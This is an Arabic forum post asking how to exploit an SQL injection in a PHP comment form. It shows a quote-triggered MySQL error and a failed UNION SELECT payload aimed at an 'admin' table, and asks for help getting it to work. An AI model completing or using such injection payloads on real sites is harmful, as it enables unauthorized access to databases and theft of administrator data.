السلام عليكم ورحمة الله وبركاته
لدي فورم يقوم بارسال التعليقات
ببساطة هذا الفورم قمت بالتعديل على السورس فقط بجعل الـ post الى get
وجدت المتغيرات عند الارسال تكون على هذا الشكل
كود PHP:
post.php?title=11111&comment=22222&send=ok
الان عندم اقوم باضافة علامة التنصيص الـ (') الى احدى المتغيرات يظهر خطأ الماي سكويل
كود PHP:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '222222222', '0', '', '')' at line 1
وعندما احاول استغلال الثغرة وكأنها get باضافة الامر
كود PHP:
+union+select+id+from+admin
يظهر خطأ
كود PHP:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select id from admin, '111111111', '222222222', '0', '', '')' at line 1
يبدو ان ثغرات البوست لها طريقة استغلال اخرى
او ربما لاني احاول استخدام امر استخراج بيانات من القاعدة و البوست اساسا لادخال البيانت للقاعدة
اصحاب الخبرات ماذا يرون ؟
;dt jl hsjyghg eyvhj hgf,sj php post ?